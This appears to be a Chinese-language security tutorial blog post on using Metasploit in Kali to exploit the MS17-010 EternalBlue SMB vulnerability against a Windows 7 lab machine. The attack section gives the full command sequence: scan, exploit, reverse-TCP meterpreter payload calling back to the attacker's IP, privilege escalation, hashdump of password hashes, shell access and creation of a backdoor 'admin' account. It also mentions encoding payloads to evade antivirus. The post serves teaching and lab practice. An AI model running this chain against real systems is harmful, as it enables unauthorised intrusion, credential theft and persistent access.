網絡安全從入門到精通(第十章-3)利用工具快速拿下服務器(KaLi-MSF)

本文內容:
		~認識MSF和永恆之藍
		~MSF的基礎命令
		~漏洞利用基本流程
		~實戰漏洞利用
額外說明:
		這篇文章,僅僅作爲擴展,大家瞭解一下MSF(美少婦)

一、認識MSF和永恆之藍

1,定義
		Metasploit是一個免費的、可下載的框架,通過它可以很容易地獲取、
		開發並對計算機軟件漏洞實施攻擊。它本身附帶數百個已知軟件漏洞的
		專業級漏洞攻擊工具		
		
		我們能夠通過它發現漏洞並進行快速實施攻擊(需要在授權的情況下!)
				//這款“美少婦”工具kali自帶
2,使用
		第一次使用MSF,

		開啓數據庫:service postgresql start
		
		初始化msf數據庫:  msfdb init
		
		開啓MSF:  msfconsole
		
		注意:
				~這是初始化msf的默認數據庫,不然運行會比較慢
					以後再使用的話,就直接開啓msf即可
				
				~MSF的啓動漫畫是隨機的

二、MSF的基礎命令

1,msf5的五大模塊

		~auxiliary  輔助模塊
		
				爲滲透測試信息蒐集提供了大量的輔助模塊支持
				
				命名規則:
						操作系統/服務/名稱      
						windows/smb/ms17_010_eternalblue 
	
		
		~Exploits	攻擊模塊
		
				利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊,
				從而獲得對遠程目標系統訪問權的代碼組件。
		
		~Payload	攻擊載荷模塊
		
				攻擊成功後促使靶機運行的一段植入代碼
				
				命名規則:
						操作系統/類型/名稱   
						windows/x64/meterpreter/reverse_tcp  

			
		~Post		後滲透攻擊模塊
		
				收集更多信息或進一步訪問被利用的目標系統

		~Encoders	編碼模塊
		
				將攻擊載荷進行編碼,來繞過防護軟件攔截

2,常用命令
		~help/?	      	 幫助菜單

		~exit			 退出msf

		~Back        	 返回

		~show			 顯示所給類型的模塊
				
				例如:show auxiliary		//查看輔助模塊
					
				補充:
						~rank表示好用級別:
								normal(正常),
								excellent(優秀),
								good(良好),
								average(平均)

						~數字	
								代表一種作用,可以直接用前邊數字調用
			
		
		~info			顯示一個或者多個模塊的信息
			
				例如: 	info windows/smb/ms17_010_eternalblue

		~search 		 尋找
				
				例如:search ms17
		
		
		~更新MSF:apt-get  install metasploit-framework

三、漏洞利用基本流程

	掃描靶機 		
	
			use auxiliary/scanner/smb/smb_ms17_010		//使用輔助模塊
			
			進入此模塊,輸入options,
			在這個下,我們可以看看我們需要設置哪些參數
					
				(	Required欄爲“yes”的參數,要不是系統已經設置好的
					要不就是需要我們設置的	)
					
			例如 :我們設置rhosts,	set rhosts 192.168.221.129

	選擇exploit		
			
			之後出現的結果,前邊出現綠色的“[+]”且後邊出現我們的目標IP
			就說明我們可以進行攻擊
			
			back	返回上一級
			
			use exploit/windows/smb/ms17_010_eternalblue
			
			option看一下
			
			set rhosts 192.168.221.129
			
	選擇payload		
			
			set payload windows/x64/meterpreter/reverse_tcp	
			
			options看一下(因爲payload也需要設置配置)
			
			set lhosts	192.168.221.133		//lhosts是本機IP
			//	設置之後,
				我們之前打進去的木馬,就會來找我們的IP
			
	攻擊			exploit
		
	提權			getsystem
		
	枚舉密碼			hashdump	//一般密碼都是加密的
		
	去拿個shell		shell
	
	查看權限			whoami
	
	在嘗試添加一個賬戶
	net user admin admin /add
	
	在看看所有用戶	net user
	
	//本次攻擊靶機是win 7 sp1		//win 7 企業版

四、實戰漏洞利用

1,正反向連接
		~正向連接 : 我們去連接木馬
		~反向連接 : 木馬來連接我們		//這個更穩定一些,且不太容易被攔截

2,不熟悉的話,多練習幾遍

3,提權的原理
		對面(目標)運行的一些程序具有高權限,
		我們利用這個進程執行一些命令,以達到我麼的目的
		
		iis6.0de提權	建議百度一下
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章